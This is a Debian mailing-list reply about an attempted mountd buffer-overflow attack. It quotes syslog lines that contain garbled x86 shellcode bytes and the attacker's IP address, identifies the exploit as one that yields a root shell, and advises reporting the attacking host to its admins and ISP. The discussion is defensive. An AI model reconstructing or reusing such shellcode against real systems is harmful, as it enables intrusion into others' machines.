Ben Pfaff wrote: > [CC:'s are appreciated; I am not subscribed to debian-user. Thanks!] > > I got the followed logged in my /var/log/syslog today. It looks to me > like a buffer overflow attack of some kind (character is `no > operation' in x86 assembly language). Does anyone know of a > vulnerability in mountd to this sort of thing?
Yes, this particular exploit has to be the most-tried on the net right now. I've had it tried against my system no fewer than 8 times in the past 2 months. Current versions of debian are not vunerable. It's a buffer overrun exploit leading to root shell, I think. > Jan 31 18:26:41 pfaffben 29>Jan 31 18:26:41 mountd[355]: NFS mount of > 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL > > PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL > PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet > ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H( > Jan 31 18:26:41 pfaffben > ^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H > attempted from 129.247.106.135 > Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together > Jan 31 18:26:41 pfaffben mountd[355]: NFS client <anon clnt> tried to access > 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL > > PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL > PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet > ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H( > Jan 31 18:26:41 pfaffben > -^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H > > Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together > Jan 31 18:26:41 pfaffben mountd[355]: Blocked attempt of 129.247.106.135 to > mount > 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL > > PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL > PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ It's worth informing the admins of this box that their box has been cracked and is being used as a platform to attack others. It's also worthwhile informing thier ISP about this in case this is the cracker's actual home machine. -- see shy jo